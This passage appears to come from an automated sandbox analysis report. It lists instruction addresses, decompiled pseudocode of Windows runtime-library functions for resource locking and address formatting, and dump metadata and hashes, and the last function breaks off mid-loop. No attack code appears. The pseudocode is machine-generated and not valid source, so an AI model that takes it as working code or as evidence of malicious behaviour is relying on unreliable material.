                                                                                                                                                              0x021a2336
                                                                                                                                                              0x021a2336
                                                                                                                                                              0x021a233b
                                                                                                                                                              0x021a233d
                                                                                                                                                              0x021a2350
                                                                                                                                                              0x021a2351
                                                                                                                                                              0x021a2356
                                                                                                                                                              0x021a2359
                                                                                                                                                              0x021a2359
                                                                                                                                                              0x021a235b
                                                                                                                                                              0x021a235d
                                                                                                                                                              0x02165367
                                                                                                                                                              0x0216536b
                                                                                                                                                              0x02165372
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x021a2363
                                                                                                                                                              0x021a2363
                                                                                                                                                              0x021a2369
                                                                                                                                                              0x021a236a
                                                                                                                                                              0x021a236c
                                                                                                                                                              0x021a2371
                                                                                                                                                              0x021a2373
                                                                                                                                                              0x00000000
                                                                                                                                                              0x021a2379
                                                                                                                                                              0x021a2379
                                                                                                                                                              0x021a237a
                                                                                                                                                              0x021a237f
                                                                                                                                                              0x021a237f
                                                                                                                                                              0x021a2385
                                                                                                                                                              0x021a2386
                                                                                                                                                              0x021a2389
                                                                                                                                                              0x021a238e
                                                                                                                                                              0x021a2390
                                                                                                                                                              0x02165378
                                                                                                                                                              0x0216537c
                                                                                                                                                              0x021a2396
                                                                                                                                                              0x021a2396
                                                                                                                                                              0x021a2397
                                                                                                                                                              0x021a239c
                                                                                                                                                              0x021a23a2
                                                                                                                                                              0x021a23a3
                                                                                                                                                              0x021a23a6
                                                                                                                                                              0x021a23ab
                                                                                                                                                              0x021a23ad
                                                                                                                                                              0x00000000
                                                                                                                                                              0x021a23b3
                                                                                                                                                              0x021a23b3
                                                                                                                                                              0x021a23b4
                                                                                                                                                              0x021a23b9
                                                                                                                                                              0x021a23ba
                                                                                                                                                              0x021a23ba
                                                                                                                                                              0x021a23bc
                                                                                                                                                              0x021a23bf
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x02199153
                                                                                                                                                              0x02199158
                                                                                                                                                              0x0219915a
                                                                                                                                                              0x0219915e
                                                                                                                                                              0x02199160
                                                                                                                                                              0x00000000
                                                                                                                                                              0x02199166
                                                                                                                                                              0x02199166
                                                                                                                                                              0x02199171
                                                                                                                                                              0x02199176
                                                                                                                                                              0x02199176
                                                                                                                                                              0x00000000
                                                                                                                                                              0x02199160
                                                                                                                                                              0x021a23c6
                                                                                                                                                              0x021a23ce
                                                                                                                                                              0x021a23d7
                                                                                                                                                              0x021a23d7
                                                                                                                                                              0x021a23ad
                                                                                                                                                              0x021a2390
                                                                                                                                                              0x021a2373
                                                                                                                                                              0x021a233f
                                                                                                                                                              0x021a233f
                                                                                                                                                              0x00000000
                                                                                                                                                              0x021a233f
                                                                                                                                                              0x021a2291
                                                                                                                                                              0x021a2291
                                                                                                                                                              0x021a2293
                                                                                                                                                              0x021a2295
                                                                                                                                                              0x021a229a
                                                                                                                                                              0x021a22a1
                                                                                                                                                              0x021a22a3
                                                                                                                                                              0x021a22a7
                                                                                                                                                              0x021a22a9
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x021a22ab
                                                                                                                                                              0x021a22ad
                                                                                                                                                              0x021a22af
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x021a22af
                                                                                                                                                              0x021a22b1
                                                                                                                                                              0x021a22b4
                                                                                                                                                              0x021a22b4
                                                                                                                                                              0x021a22b6
                                                                                                                                                              0x021653be
                                                                                                                                                              0x021653be
                                                                                                                                                              0x021653be
                                                                                                                                                              0x021653c0
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x021653cb
                                                                                                                                                              0x021653ce
                                                                                                                                                              0x021653d0
                                                                                                                                                              0x021653d4
                                                                                                                                                              0x021653d6
                                                                                                                                                              0x00000000
                                                                                                                                                              0x021653d8
                                                                                                                                                              0x021653e3
                                                                                                                                                              0x021653ea
                                                                                                                                                              0x021653ea
                                                                                                                                                              0x00000000
                                                                                                                                                              0x021653d6
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x021a22b6
                                                                                                                                                              0x00000000
                                                                                                                                                              0x021a228f
                                                                                                                                                              0x021a2349
                                                                                                                                                              0x021a234d
                                                                                                                                                              0x021a2251
                                                                                                                                                              0x021a2251
                                                                                                                                                              0x00000000
                                                                                                                                                              0x021a2251
                                                                                                                                                              0x021a21a4
                                                                                                                                                              0x021a21a4
                                                                                                                                                              0x021a21a6
                                                                                                                                                              0x021a21a8
                                                                                                                                                              0x021a21ac
                                                                                                                                                              0x021a21b6
                                                                                                                                                              0x021a21b8
                                                                                                                                                              0x021a21bc
                                                                                                                                                              0x021a21be
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x021a21c0
                                                                                                                                                              0x021a21c2
                                                                                                                                                              0x021a21c4
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x021a21c4
                                                                                                                                                              0x021a21c6
                                                                                                                                                              0x021a21c6
                                                                                                                                                              0x021a21c8
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x021a21c8
                                                                                                                                                              0x021a21a2
                                                                                                                                                              0x00000000
                                                                                                                                                              0x021a2183
                                                                                                                                                              0x0218057b
                                                                                                                                                              0x0218057d
                                                                                                                                                              0x02180581
                                                                                                                                                              0x02180583
                                                                                                                                                              0x021a2178
                                                                                                                                                              0x00000000
                                                                                                                                                              0x02180589
                                                                                                                                                              0x0218058f
                                                                                                                                                              0x0218058f
                                                                                                                                                              0x02180583
                                                                                                                                                              0x00000000

                                                                                                                                                              APIs
                                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 021A2206
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2390231666.0000000002130000.00000040.00000001.sdmp, Offset: 02120000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.2390223337.0000000002120000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390330702.0000000002210000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390335585.0000000002220000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390341218.0000000002224000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390345903.0000000002227000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390352303.0000000002230000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390389715.0000000002290000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                              • API String ID: 885266447-4236105082
                                                                                                                                                              • Opcode ID: 905469a1c0d63189433d2606818fcffa56cd572b32fb9ac6209e6e2f08eb77b3
                                                                                                                                                              • Instruction ID: b0d53e5fa063ae3fa77e72e33f08a24e1dadb78d729747006fbc6896b37a9735
                                                                                                                                                              • Opcode Fuzzy Hash: 905469a1c0d63189433d2606818fcffa56cd572b32fb9ac6209e6e2f08eb77b3
                                                                                                                                                              • Instruction Fuzzy Hash: 95515B357802116FEF18DE18CCD0F6673AAAF98720F214269FC59DB285DB31EC418BA0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 021814C0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 64%
                                                                                                                                                              			E021814C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
				signed int _v8;
				char _v10;
				char _v140;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t24;
				void* _t26;
				signed int _t29;
				signed int _t34;
				signed int _t40;
				intOrPtr _t45;
				void* _t51;
				intOrPtr* _t52;
				void* _t54;
				signed int _t57;
				void* _t58;

				_t51 = __edx;
				_t24 =  *0x2222088; // 0x77464aef
				_v8 = _t24 ^ _t57;
				_t45 = _a16;
				_t53 = _a4;
				_t52 = _a20;
				if(_a4 == 0 || _t52 == 0) {
					L10:
					_t26 = 0xc000000d;
				} else {
					if(_t45 == 0) {
						if( *_t52 == _t45) {
							goto L3;
						} else {
							goto L10;
						}
					} else {
						L3:
						_t28 =  &_v140;
						if(_a12 != 0) {
							_push("[");
							_push(0x41);
							_push( &_v140);
							_t29 = E02177707();
							_t58 = _t58 + 0xc;
							_t28 = _t57 + _t29 * 2 - 0x88;
						}
						_t54 = E021813CB(_t53, _t28);
						if(_a8 != 0) {
							_t34 = E02177707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t34 * 2;
						}
						if(_a12 != 0) {
							_t40 = E02177707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t40 * 2;
						}
						_t53 = (_t54 -  &_v140 >> 1) + 1;
						 *_t52 = _t53;
						if( *_t52 < _t53) {
							goto L10;
						} else {
							E02142340(_t45,  &_v140, _t53 + _t53);
							_t26 = 0;
						}
					}
				}
				return E0214E1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
			}




















                                                                                                                                                              0x021814c0
                                                                                                                                                              0x021814cb
                                                                                                                                                              0x021814d2
                                                                                                                                                              0x021814d6
                                                                                                                                                              0x021814da
                                                                                                                                                              0x021814de
                                                                                                                                                              0x021814e3
                                                                                                                                                              0x0218157a
                                                                                                                                                              0x0218157a
                                                                                                                                                              0x021814f1
                                                                                                                                                              0x021814f3
                                                                                                                                                              0x021aea0f
                                                                                                                                                              0x00000000
                                                                                                                                                              0x021aea15
                                                                                                                                                              0x00000000
                                                                                                                                                              0x021aea15
                                                                                                                                                              0x021814f9
                                                                                                                                                              0x021814f9
                                                                                                                                                              0x021814fe
                                                                                                                                                              0x02181504
                                                                                                                                                              0x021aea1a
                                                                                                                                                              0x021aea1f
                                                                                                                                                              0x021aea21
                                                                                                                                                              0x021aea22
                                                                                                                                                              0x021aea27
                                                                                                                                                              0x021aea2a
                                                                                                                                                              0x021aea2a
                                                                                                                                                              0x02181515
                                                                                                                                                              0x02181517
                                                                                                                                                              0x0218156d
                                                                                                                                                              0x02181572
                                                                                                                                                              0x02181575
                                                                                                                                                              0x02181575
                                                                                                                                                              0x0218151e
                                                                                                                                                              0x021aea50
                                                                                                                                                              0x021aea55
                                                                                                                                                              0x021aea58
                                                                                                                                                              0x021aea58
                                                                                                                                                              0x0218152e
                                                                                                                                                              0x02181531
                                                                                                                                                              0x02181533
                                                                                                                                                              0x00000000
                                                                                                                                                              0x02181535
                                                                                                                                                              0x02181541
                                                                                                                                                              0x02181549
                                                                                                                                                              0x02181549
                                                                                                                                                              0x02181533
                                                                                                                                                              0x021814f3
                                                                                                                                                              0x02181559

                                                                                                                                                              APIs
                                                                                                                                                              • ___swprintf_l.LIBCMT ref: 021AEA22
                                                                                                                                                                • Part of subcall function 021813CB: ___swprintf_l.LIBCMT ref: 0218146B
                                                                                                                                                                • Part of subcall function 021813CB: ___swprintf_l.LIBCMT ref: 02181490
                                                                                                                                                              • ___swprintf_l.LIBCMT ref: 0218156D
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2390231666.0000000002130000.00000040.00000001.sdmp, Offset: 02120000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.2390223337.0000000002120000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390330702.0000000002210000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390335585.0000000002220000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390341218.0000000002224000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390345903.0000000002227000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390352303.0000000002230000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390389715.0000000002290000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ___swprintf_l
                                                                                                                                                              • String ID: %%%u$]:%u
                                                                                                                                                              • API String ID: 48624451-3050659472
                                                                                                                                                              • Opcode ID: 29bd595507f5941f40d192a088aa2f18db55e456dee55509ddddd2ccf56aee81
                                                                                                                                                              • Instruction ID: 7e2867af56ec6a28054d74941307b370434302322fdb11f0778fd9b053a17a8b
                                                                                                                                                              • Opcode Fuzzy Hash: 29bd595507f5941f40d192a088aa2f18db55e456dee55509ddddd2ccf56aee81
                                                                                                                                                              • Instruction Fuzzy Hash: 5221C173980219AFDB21EE58CC84AEFB3BCAB50714F454561EC4AD3140DB71AA5ACFE1
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 021653A5, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 45%
                                                                                                                                                              			E021653A5(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t32;
				signed int _t37;
				signed int _t40;
				signed int _t42;
				void* _t45;
				intOrPtr _t46;
				void* _t48;
				signed int _t49;
				void* _t51;
				signed int _t57;
				signed int _t64;
				signed int _t71;
				void* _t74;
				intOrPtr _t78;
				signed int* _t79;
				void* _t85;
				signed int _t86;
				signed int _t92;
				void* _t104;
				void* _t105;

				_t64 = _a4;
				_t32 =  *(_t64 + 0x28);
				_t71 = _t64 + 0x28;
				_push(_t92);
				if(_t32 < 0) {
					_t78 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
						goto L3;
					} else {
						__eflags = _t32 | 0xffffffff;
						asm("lock xadd [ecx], eax");
						return 1;
					}
				} else {
					L3:
					_push(_t86);
					while(1) {
						L4:
						__eflags = _t32;
						if(_t32 == 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
							_t79 = _t64 + 0x24;
							_t71 = 1;
							asm("lock xadd [eax], ecx");
							_t32 =  *(_t64 + 0x28);
							_a4 = _t32;
							__eflags = _t32;
							if(_t32 != 0) {
								L19:
								_t86 = 0;
								__eflags = 0;
								while(1) {
									_t81 =  *(_t64 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x022201c0;
									_push(_t92);
									_push(0);
									_t37 = E0213F8CC( *((intOrPtr*)(_t64 + 0x20)));
									__eflags = _t37 - 0x102;
									if(_t37 != 0x102) {
										break;
									}
									_t71 =  *(_t92 + 4);
									_t85 =  *_t92;
									_t51 = E02184FC0(_t85, _t71, 0xff676980, 0xffffffff);
									_push(_t85);
									_push(_t51);
									E02193F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
									E02193F92(0x65, 0, "RTL: Resource at %p\n", _t64);
									_t86 = _t86 + 1;
									_t105 = _t104 + 0x28;
									__eflags = _t86 - 2;
									if(__eflags > 0) {
										E021C217A(_t71, __eflags, _t64);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E02193F92();
									_t104 = _t105 + 0xc;
								}
								__eflags = _t37;
								if(__eflags < 0) {
									_push(_t37);
									E02183915(_t64, _t71, _t81, _t86, _t92, __eflags);
									asm("int3");
									_t40 =  *_t71;
									 *_t71 = 0;
									__eflags = _t40;
									if(_t40 == 0) {
										L1:
										_t42 = E02165384(_t92 + 0x24);
										if(_t42 != 0) {
											goto L31;
										} else {
											goto L2;
										}
									} else {
										_t83 =  *((intOrPtr*)(_t92 + 0x18));
										_push( &_a4);
										_push(_t40);
										_t49 = E0213F970( *((intOrPtr*)(_t92 + 0x18)));
										__eflags = _t49;
										if(__eflags >= 0) {
											goto L1;
										} else {
											_push(_t49);
											E02183915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
											L31:
											_t82 =  *((intOrPtr*)(_t92 + 0x20));
											_push( &_a4);
											_push(1);
											_t42 = E0213F970( *((intOrPtr*)(_t92 + 0x20)));
											__eflags = _t42;
											if(__eflags >= 0) {
												L2:
												return _t42;
											} else {
												_push(_t42);
												E02183915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
												_t73 =  *((intOrPtr*)(_t92 + 0x20));
												_push( &_a4);
												_push(1);
												_t42 = E0213F970( *((intOrPtr*)(_t92 + 0x20)));
												__eflags = _t42;
												if(__eflags >= 0) {
													goto L2;
												} else {
													_push(_t42);
													_t45 = E02183915(_t64, _t73, _t82, _t86, _t92, __eflags);
													asm("int3");
													while(1) {
														_t74 = _t45;
														__eflags = _t45 - 1;
														if(_t45 != 1) {
															break;
														}
														_t86 = _t86 | 0xffffffff;
														_t45 = _t74;
														asm("lock cmpxchg [ebx], edi");
														__eflags = _t45 - _t74;
														if(_t45 != _t74) {
															continue;
														} else {
															_t46 =  *[fs:0x18];
															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
															return _t46;
														}
														goto L38;
													}
													E02165329(_t74, _t92);
													_push(1);
													_t48 = E021653A5(_t92);
													return _t48;
												}
											}
										}
									}
								} else {
									_t32 =  *(_t64 + 0x28);
									continue;
								}
							} else {
								_t71 =  *_t79;
								__eflags = _t71;
								if(__eflags > 0) {
									while(1) {
										_t57 = _t71;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t57 - _t71;
										if(_t57 == _t71) {
											break;
										}
										_t71 = _t57;
										__eflags = _t57;
										if(_t57 > 0) {
											continue;
										}
										break;
									}
									_t32 = _a4;
									__eflags = _t71;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L19;
								}
							}
						}
						goto L38;
					}
					_t71 = _t71 | 0xffffffff;
					_t32 = 0;
					asm("lock cmpxchg [edx], ecx");
					__eflags = 0;
					if(0 != 0) {
						goto L4;
					} else {
						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
						return 1;
					}
				}
				L38:
			}


























                                                                                                                                                              0x021653ab
                                                                                                                                                              0x021653ae
                                                                                                                                                              0x021653b1
                                                                                                                                                              0x021653b4
                                                                                                                                                              0x021653b7
                                                                                                                                                              0x021805b6
                                                                                                                                                              0x021805c0
                                                                                                                                                              0x021805c3
                                                                                                                                                              0x00000000
                                                                                                                                                              0x021805c9
                                                                                                                                                              0x021805c9
                                                                                                                                                              0x021805cc
                                                                                                                                                              0x021805d5
                                                                                                                                                              0x021805d5
                                                                                                                                                              0x021653bd
                                                                                                                                                              0x021653bd
                                                                                                                                                              0x021653bd
                                                                                                                                                              0x021653be
                                                                                                                                                              0x021653be
                                                                                                                                                              0x021653be
                                                                                                                                                              0x021653c0
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x021a2269
                                                                                                                                                              0x021a226d
                                                                                                                                                              0x021a2349
                                                                                                                                                              0x021a234d
                                                                                                                                                              0x021a2273
                                                                                                                                                              0x021a2276
                                                                                                                                                              0x021a2279
                                                                                                                                                              0x021a227e
                                                                                                                                                              0x021a2283
                                                                                                                                                              0x021a2287
                                                                                                                                                              0x021a228a
                                                                                                                                                              0x021a228d
                                                                                                                                                              0x021a228f
                                                                                                                                                              0x021a22bc
                                                                                                                                                              0x021a22bc
                                                                                                                                                              0x021a22bc
                                                                                                                                                              0x021a22be
                                                                                                                                                              0x021a22c4
                                                                                                                                                              0x021a22cc
                                                                                                                                                              0x021a22d0
                                                                                                                                                              0x021a22d6
                                                                                                                                                              0x021a22d7
                                                                                                                                                              0x021a22da
                                                                                                                                                              0x021a22df
                                                                                                                                                              0x021a22e4
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x021a22e6
                                                                                                                                                              0x021a22e9
                                                                                                                                                              0x021a22f4
                                                                                                                                                              0x021a22f9
                                                                                                                                                              0x021a22fa
                                                                                                                                                              0x021a2305
                                                                                                                                                              0x021a2314
                                                                                                                                                              0x021a2319
                                                                                                                                                              0x021a231a
                                                                                                                                                              0x021a231d
                                                                                                                                                              0x021a2320
                                                                                                                                                              0x021a2323
                                                                                                                                                              0x021a2323
                                                                                                                                                              0x021a2328
                                                                                                                                                              0x021a232d
                                                                                                                                                              0x021a232f
                                                                                                                                                              0x021a2331
                                                                                                                                                              0x021a2336
                                                                                                                                                              0x021a2336
                                                                                                                                                              0x021a233b
                                                                                                                                                              0x021a233d
                                                                                                                                                              0x021a2350
                                                                                                                                                              0x021a2351
                                                                                                                                                              0x021a2356
                                                                                                                                                              0x021a2359
                                                                                                                                                              0x021a2359
                                                                                                                                                              0x021a235b
                                                                                                                                                              0x021a235d
                                                                                                                                                              0x02165367
                                                                                                                                                              0x0216536b
                                                                                                                                                              0x02165372
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x021a2363
                                                                                                                                                              0x021a2363
                                                                                                                                                              0x021a2369
                                                                                                                                                              0x021a236a
                                                                                                                                                              0x021a236c
                                                                                                                                                              0x021a2371
                                                                                                                                                              0x021a2373
                                                                                                                                                              0x00000000
                                                                                                                                                              0x021a2379
                                                                                                                                                              0x021a2379
                                                                                                                                                              0x021a237a
                                                                                                                                                              0x021a237f
                                                                                                                                                              0x021a237f
                                                                                                                                                              0x021a2385
                                                                                                                                                              0x021a2386
                                                                                                                                                              0x021a2389
                                                                                                                                                              0x021a238e
                                                                                                                                                              0x021a2390
                                                                                                                                                              0x02165378
                                                                                                                                                              0x0216537c
                                                                                                                                                              0x021a2396
                                                                                                                                                              0x021a2396
                                                                                                                                                              0x021a2397
                                                                                                                                                              0x021a239c
                                                                                                                                                              0x021a23a2
                                                                                                                                                              0x021a23a3
                                                                                                                                                              0x021a23a6
                                                                                                                                                              0x021a23ab
                                                                                                                                                              0x021a23ad
                                                                                                                                                              0x00000000
                                                                                                                                                              0x021a23b3
                                                                                                                                                              0x021a23b3
                                                                                                                                                              0x021a23b4
                                                                                                                                                              0x021a23b9
                                                                                                                                                              0x021a23ba
                                                                                                                                                              0x021a23ba
                                                                                                                                                              0x021a23bc
                                                                                                                                                              0x021a23bf
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x02199153
                                                                                                                                                              0x02199158
                                                                                                                                                              0x0219915a
                                                                                                                                                              0x0219915e
                                                                                                                                                              0x02199160
                                                                                                                                                              0x00000000
                                                                                                                                                              0x02199166
                                                                                                                                                              0x02199166
                                                                                                                                                              0x02199171
                                                                                                                                                              0x02199176
                                                                                                                                                              0x02199176
                                                                                                                                                              0x00000000
                                                                                                                                                              0x02199160
                                                                                                                                                              0x021a23c6
                                                                                                                                                              0x021a23cb
                                                                                                                                                              0x021a23ce
                                                                                                                                                              0x021a23d7
                                                                                                                                                              0x021a23d7
                                                                                                                                                              0x021a23ad
                                                                                                                                                              0x021a2390
                                                                                                                                                              0x021a2373
                                                                                                                                                              0x021a233f
                                                                                                                                                              0x021a233f
                                                                                                                                                              0x00000000
                                                                                                                                                              0x021a233f
                                                                                                                                                              0x021a2291
                                                                                                                                                              0x021a2291
                                                                                                                                                              0x021a2293
                                                                                                                                                              0x021a2295
                                                                                                                                                              0x021a229a
                                                                                                                                                              0x021a22a1
                                                                                                                                                              0x021a22a3
                                                                                                                                                              0x021a22a7
                                                                                                                                                              0x021a22a9
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x021a22ab
                                                                                                                                                              0x021a22ad
                                                                                                                                                              0x021a22af
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x021a22af
                                                                                                                                                              0x021a22b1
                                                                                                                                                              0x021a22b4
                                                                                                                                                              0x021a22b4
                                                                                                                                                              0x021a22b6
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x021a22b6
                                                                                                                                                              0x021a228f
                                                                                                                                                              0x00000000
                                                                                                                                                              0x021a226d
                                                                                                                                                              0x021653cb
                                                                                                                                                              0x021653ce
                                                                                                                                                              0x021653d0
                                                                                                                                                              0x021653d4
                                                                                                                                                              0x021653d6
                                                                                                                                                              0x00000000
                                                                                                                                                              0x021653d8
                                                                                                                                                              0x021653e3
                                                                                                                                                              0x021653ea
                                                                                                                                                              0x021653ea
                                                                                                                                                              0x021653d6
                                                                                                                                                              0x00000000

                                                                                                                                                              APIs
                                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 021A22F4
                                                                                                                                                              Strings
                                                                                                                                                              • RTL: Re-Waiting, xrefs: 021A2328
                                                                                                                                                              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 021A22FC
                                                                                                                                                              • RTL: Resource at %p, xrefs: 021A230B
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2390231666.0000000002130000.00000040.00000001.sdmp, Offset: 02120000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.2390223337.0000000002120000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390330702.0000000002210000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390335585.0000000002220000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390341218.0000000002224000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390345903.0000000002227000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390352303.0000000002230000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390389715.0000000002290000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                              • API String ID: 885266447-871070163
                                                                                                                                                              • Opcode ID: ee5c8619fac6b78dc7e97b95b3776504f7c85c11e35a1e24629433a089e6e763
                                                                                                                                                              • Instruction ID: 8d25b080a751d7975d5aed76311a4ee14772efccb5776382bff83f8e0fffc171
                                                                                                                                                              • Opcode Fuzzy Hash: ee5c8619fac6b78dc7e97b95b3776504f7c85c11e35a1e24629433a089e6e763
                                                                                                                                                              • Instruction Fuzzy Hash: 3A5107756807116FEF15DF28CC80FAB739AAF58724F154269FD19DB280EB71E8418BA0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0216EC56, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 145COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 51%
                                                                                                                                                              			E0216EC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v24;
				intOrPtr* _v28;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __esi;
				intOrPtr _t38;
				intOrPtr _t39;
				signed int _t40;
				intOrPtr _t42;
				intOrPtr _t43;
				signed int _t44;
				void* _t46;
				intOrPtr _t48;
				signed int _t49;
				intOrPtr _t50;
				intOrPtr _t53;
				signed char _t67;
				void* _t72;
				intOrPtr _t77;
				intOrPtr* _t80;
				intOrPtr _t84;
				intOrPtr* _t85;
				void* _t91;
				void* _t92;
				void* _t93;

				_t80 = __edi;
				_t75 = __edx;
				_t70 = __ecx;
				_t84 = _a4;
				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
					E0215DA92(__ecx, __edx, __eflags, _t84);
					_t38 =  *((intOrPtr*)(_t84 + 0x10));
				}
				_push(0);
				__eflags = _t38 - 0xffffffff;
				if(_t38 == 0xffffffff) {
					_t39 =  *0x222793c; // 0x0
					_push(0);
					_push(_t84);
					_t40 = E021416C0(_t39);
				} else {
					_t40 = E0213F9D4(_t38);
				}
				_pop(_t85);
				__eflags = _t40;
				if(__eflags < 0) {
					_push(_t40);
					E02183915(_t67, _t70, _t75, _t80, _t85, __eflags);
					asm("int3");
					while(1) {
						L21:
						_t76 =  *[fs:0x18];
						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
						__eflags =  *(_t42 + 0x240) & 0x00000002;
